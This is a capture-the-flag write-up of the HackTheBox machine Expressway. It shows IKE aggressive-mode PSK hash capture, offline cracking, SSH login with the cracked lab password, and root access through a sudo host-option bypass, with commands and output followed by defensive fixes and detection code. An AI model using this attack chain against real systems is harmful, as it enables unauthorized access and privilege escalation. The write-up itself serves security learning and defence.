Expressway — HackTheBox

Difficulty: Medium

Introduction

Expressway is a HackTheBox machine focused on IPsec/IKE reconnaissance; it delves into PSK cracking, SSH pivoting, and a hostname-based sudo bypass. Key takeaways from this box were network enumeration, privilege escalation, and learning about PSK-authenticated protocols.

Reconnaissance

I always personally begin any box with a simple TCP port scan:

nmap -sV -sC -vv -oA expressway 10.129.99.253

Output:

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The only port that showed on the TCP scan was SSH on port 22, so I continued enumerating the machine with a UDP scan. In parallel I also ran a full-port TCP scan, since by default nmap only scans the 1,000 most common ports per protocol.

nmap -sV -sC -vv -p- -oA expressway 10.129.99.253
nmap -sU -sV -sC -vv -T4 -oA expressway 10.129.99.253

UDP scan output:

PORT      STATE         SERVICE        VERSION
68/udp    open|filtered dhcpc
69/udp    open          tftp           Netkit tftpd or atftpd
500/udp   open          isakmp?
1044/udp  open|filtered dcutility
1885/udp  open|filtered vrtstrapserver
4500/udp  open|filtered nat-t-ike
5001/udp  open|filtered commplex-link
18258/udp open|filtered unknown
18888/udp open|filtered apc-necmp

TCP Scan:

  • Yielded little to nothing of value

UDP Scan:

  • DHCP Client: Dynamic Host Configuration Protocol
  • TFTP: Trivial File Transfer Protocol
  • ISAKMP?: Internet Security Association and Key Management Protocol
  • NAT-T: Network Address Translation - Traversal

My initial plan of action at this point was one of these three:

  1. Brute force the SSH username and credentials
  2. Research TFTP and any exploits that might apply to it
  3. Look into ISAKMP and learn about, or exploit, anything I can find around it

What is ISAKMP?

  • I had no idea, so to Google we went. According to the Google gods, ISAKMP is part of the Internet Key Exchange (IKE) protocol, a key component of the IPsec protocol suite, and is used to establish Security Associations (SAs) for IPsec.
    • IPsec is something I do know: it is simply a suite of protocols that lets us establish virtual private networks (VPNs) over public networks.

Research into IKE/ISAKMP (UDP 500/4500) showed that they are generally a very attractive attack surface, because implementations may run in less secure modes, leak identity information, or rely on pre-shared keys (PSKs).

After researching tools that would let us poke and prod at this open UDP port further, I came across a kit that helps with discovery and fingerprinting of IKE hosts.

ike-scan

root@kali:~# ike-scan -h
Usage: ike-scan [options] [hosts...]

Running the tool against the target exposed a treasure trove of information:

sudo ike-scan -M 10.129.99.253

The IKE handshake returned:

  • SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK ...) - the peer requires only a PSK for authentication, and the transform it accepted uses 3DES + SHA1, both deprecated by the National Institute of Standards and Technology (NIST) as insecure.
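As an added example (not from this writeup and not part of ike-scan), a small Python audit that parses an SA= line in ike-scan's output format and flags the parameters called out above; the sample line, the weak-algorithm lists and the 2048-bit MODP minimum are assumptions of this example.

```python
"""Audit the transform an IKEv1 peer accepted, taken from an ike-scan SA= line.
Added example for this writeup; the policy below is an assumption modelled on
NIST's deprecation of 3DES/SHA1 and of sub-2048-bit MODP groups."""
import re

# Constructed sample line in ike-scan's SA=(...) format, mirroring the
# handshake result discussed above (not copied from the box).
SAMPLE_SA = ("SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK "
             "LifeType=Seconds LifeDuration=28800)")

# Assumed policy: algorithms a reviewer would reject, with the reason cited.
WEAK_ENC = {"DES": "DES is broken",
            "3DES": "3DES is deprecated (64-bit block size)"}
WEAK_HASH = {"MD5": "MD5 is broken",
             "SHA1": "SHA1 is deprecated for new use"}
MIN_MODP_BITS = 2048   # smallest MODP group size accepted by this policy


def parse_sa(line):
    """Return the key=value attributes inside SA=( ... ) as a dict."""
    m = re.search(r"SA=\((.*?)\)", line)
    if not m:
        raise ValueError("no SA=(...) payload in line")
    return dict(kv.split("=", 1) for kv in m.group(1).split())


def audit_sa(line):
    """Return a list of (attribute, reason) findings for one SA line."""
    sa = parse_sa(line)
    findings = []
    if sa.get("Enc") in WEAK_ENC:
        findings.append(("Enc", WEAK_ENC[sa["Enc"]]))
    if sa.get("Hash") in WEAK_HASH:
        findings.append(("Hash", WEAK_HASH[sa["Hash"]]))
    # Group is reported as "<id>:modp<bits>"; compare the bit length.
    gm = re.search(r"modp(\d+)", sa.get("Group", ""))
    if gm and int(gm.group(1)) < MIN_MODP_BITS:
        findings.append(("Group", f"modp{gm.group(1)} is below the "
                                  f"{MIN_MODP_BITS}-bit minimum"))
    if sa.get("Auth") == "PSK":
        findings.append(("Auth", "PSK authentication: the hash is exposed "
                                 "to offline guessing if aggressive mode is on"))
    return findings


if __name__ == "__main__":
    for attr, reason in audit_sa(SAMPLE_SA):
        print(f"{attr}: {reason}")
```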

The same ike-scan page we used earlier also documents psk-crack, a companion tool for cracking MD5- or SHA1-based IKE PSK hashes (this will come in handy in a second).

ike-scan also supports aggressive mode (-A), which allows for scanning and potential collection of the identity the service leaks and of PSK material (saved with -P):

sudo ike-scan -A -Ppsk.txt 10.129.99.253

Aggressive-mode leak & PSK capture

Aggressive mode returned an identity and a hash (liquid gold):

  • ID(Type=ID_USER_FQDN, [email protected]) - the target basically handed me its virtual business card.
  • A 20-byte PSK hash was returned and saved to psk.txt

PSK cracking

  • Like most cracking of hashed passwords, this could be done with a dictionary attack using tools like John the Ripper or Hashcat (personal fav). However, I wanted to give psk-crack a try.

psk-crack -d /usr/share/wordlists/rockyou.txt psk.txt

Output:

Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash b12723ccf305828e259734c131ea45dec532db0b

Boom, we've obtained a password: freakingrockstarontheroad

With that information we can now try the credentials over SSH to see if they are reused across protocols.

ssh [email protected]
# password: freakingrockstarontheroad

Plain and simple, we obtained a user shell directly on the machine.

Capturing 1st Flag

cat user.txt

Privilege Escalation

Here are a few commands I like to run after getting any form of shell on a machine (keep in mind these are noisy):

uname -a
pwd
cat /etc/passwd
cd /root

What I found interesting:

ike@expressway:~$ sudo -l
[sudo] password for ike: <redacted>
Sorry, user ike may not run sudo on expressway.

Checking the sudo version and a quick web search for "Sorry, user __ may not run sudo on ___" turned up the following CVE on Exploit-DB.

I immediately decided to try to find another host on the network that might have sudo privileges configured, in order to leverage this CVE.

grep -Ri "expressway" /etc /var/log 2>/dev/null | sed -n '1,120p'

I spent

Recursively grepping through /etc and /var/log, ignoring case, for "expressway" is what yielded a different host.

The command yielded the following host: offramp.expressway.htb

ike@expressway:~$ sudo -h offramp.expressway.htb -i
root@expressway:~#

Boom, we got root; the box has been PWNED. The flag was in the root directory as usual.

Key Takeaways

  • Primary attack surface: UDP IKE/ISAKMP (500/4500) - the box leaked its identity in aggressive mode and exposed a PSK hash
  • Main tools/commands: nmap, ike-scan, psk-crack, ssh, sudo
  • Reason for exploit: weak/outdated crypto (3DES, SHA1), PSK reuse across services, and an unsafe sudo Host_Alias + NOPASSWD rule

Patching/Defensive

  • Patch sudo to the fixed version (1.9.17p1+ or vendor patch) and remove the vulnerable version.
  • Do not use NOPASSWD: ALL with host-based aliases. Avoid broad Host_Alias + NOPASSWD combinations; use explicit per-role rules or certificate-based sudo policies instead.
  • Use certificates rather than PSKs for IKE/IKEv2, and disable IKEv1 aggressive mode where possible: it trades security for speed.
  • Monitoring: alert on unusual sudo -h usage, and detect sudo -l enumeration.
  • Offline cracking of PSKs is effective when password hygiene is weak. SHA1 is very weak against collision attacks, but for PSK cracking the practical defence is a passphrase that cannot easily be found by a dictionary or brute-force attack.
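As an added example that is not part of this writeup, the monitoring idea above expressed as detection logic over constructed syslog-style sudo lines; it assumes sudoers logs the host option as a HOST= field and sudo -l as COMMAND=list, and the sample lines below are constructed, not captured from the box.

```python
"""Flag the sudo behaviours discussed above in auth-log lines: the host
option (HOST= field from sudo -h) and sudo -l enumeration (COMMAND=list).
Added example for this writeup; field names are assumed, samples constructed."""
import re

# Constructed sample auth.log lines (not captured from the box).
SAMPLE_LOG = """\
Oct  1 10:01:02 expressway sudo:      ike : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/ike ; USER=root ; COMMAND=list
Oct  1 10:02:15 expressway sudo:      ike : TTY=pts/0 ; PWD=/home/ike ; USER=root ; HOST=offramp.expressway.htb ; COMMAND=/bin/bash
Oct  1 10:03:40 expressway sudo:    admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sudo:\s+(?P<user>\S+) : (?P<rest>.*)$")


def parse_sudo_line(line):
    """Split one sudo syslog line into its fields; None if it is not a sudo line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"ts": m["ts"], "loghost": m["host"], "user": m["user"], "msg": None}
    for part in m["rest"].split(" ; "):
        key, sep, val = part.partition("=")
        if sep:
            rec[key] = val
        else:
            rec["msg"] = part   # free-text status such as "user NOT in sudoers"
    return rec


def detect(log_text):
    """Return (timestamp, user, reason) tuples for suspicious sudo events."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        if rec.get("COMMAND") == "list":
            alerts.append((rec["ts"], rec["user"], "sudo -l enumeration"))
        if rec["msg"] and "NOT in sudoers" in rec["msg"]:
            alerts.append((rec["ts"], rec["user"], "sudo attempt by user without sudo rights"))
        runhost = rec.get("HOST")
        # Compare short names so "expressway" vs "expressway.htb" does not alert.
        if runhost and runhost.split(".")[0] != rec["loghost"].split(".")[0]:
            alerts.append((rec["ts"], rec["user"], f"sudo -h targeting other host {runhost}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```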

Learned

  • Strong passive reconnaissance (logs, DHCP leases, certificate SANs) finds hosts faster than brute forcing.
  • UDP/IKE is a high-value service: always check 500/4500 when you see VPN-related services.